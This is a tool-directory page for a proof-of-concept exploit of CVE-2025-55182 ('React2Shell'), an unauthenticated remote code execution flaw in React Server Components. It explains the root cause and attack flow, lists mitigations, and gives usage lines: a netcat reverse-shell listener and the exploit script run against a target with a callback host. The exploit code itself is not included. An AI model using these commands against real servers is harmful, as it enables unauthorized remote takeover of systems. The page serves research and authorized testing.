Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182-React2Shell-RCE — Proof-of-concept exploit for CVE-2025-55182 (React2Shell), an unauthenticated remote code execution vulnerability in React Server Components via crafted Flight protocol payloads. | Kitploit
Tools/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRemote Access Tool

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

Proof-of-concept exploit for CVE-2025-55182 (React2Shell), an unauthenticated remote code execution vulnerability in React Server Components via crafted Flight protocol payloads.

View Repository
1103 months agoNot yet reviewed
Share

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (Unauthenticated RCE in React Server Components)

CVE-2025-55182, also known as React2Shell, is a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting React Server Components packages (versions 19.0, 19.1.0, 19.1.1, and 19.2.0).

This vulnerability may allow attackers to achieve arbitrary code execution on vulnerable servers via a single crafted HTTP request, without requiring authentication.


Overview

React Server Components use the Flight protocol to serialize and deserialize component data exchanged between client and server.

Improper validation during this deserialization process may allow specially crafted payloads to manipulate internal object structures and reach dangerous JavaScript execution primitives.


Root Cause

The vulnerability originates from insufficient validation during deserialization of React Server Components (RSC) Flight protocol payloads.

Specially crafted payloads may:

  • manipulate internal object structures
  • traverse the JavaScript prototype chain
  • access dangerous JavaScript constructors
  • achieve arbitrary code execution on the server

How It Works

  1. The exploit sends a specially crafted multipart/form-data request
  2. The server interprets the request as a React Flight payload
  3. The malicious chunk is processed during deserialization
  4. The payload:
  • manipulates the internal execution flow
  • reaches dangerous JavaScript execution primitives
  • executes arbitrary code
  1. The attacker gains remote code execution on the target server

🚀 Usage

Start a listener on your machine:

nc -lvnp 4444

Run the exploit:

python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

Requirements

  • Vulnerable React / Next.js versions
  • Server-side React Server Components enabled
  • Reachable RSC endpoint

Mitigation

To mitigate this vulnerability:

  • Upgrade React to the latest patched release available
  • Apply available framework patches
  • Monitor and block suspicious RSC requests

References

- OffSec – CVE-2025-55182 Exploitation Analysis

- Microsoft Security – Defending Against React2Shell

- React Security Advisory (Official Disclosure)


Disclaimer

This project is provided strictly for:

  • Security research
  • Educational purposes
  • Authorized security assessments and penetration testing

The authors assume no responsibility for misuse or damage caused by this material. Users are solely responsible for complying with all applicable laws and regulations.

Download Tool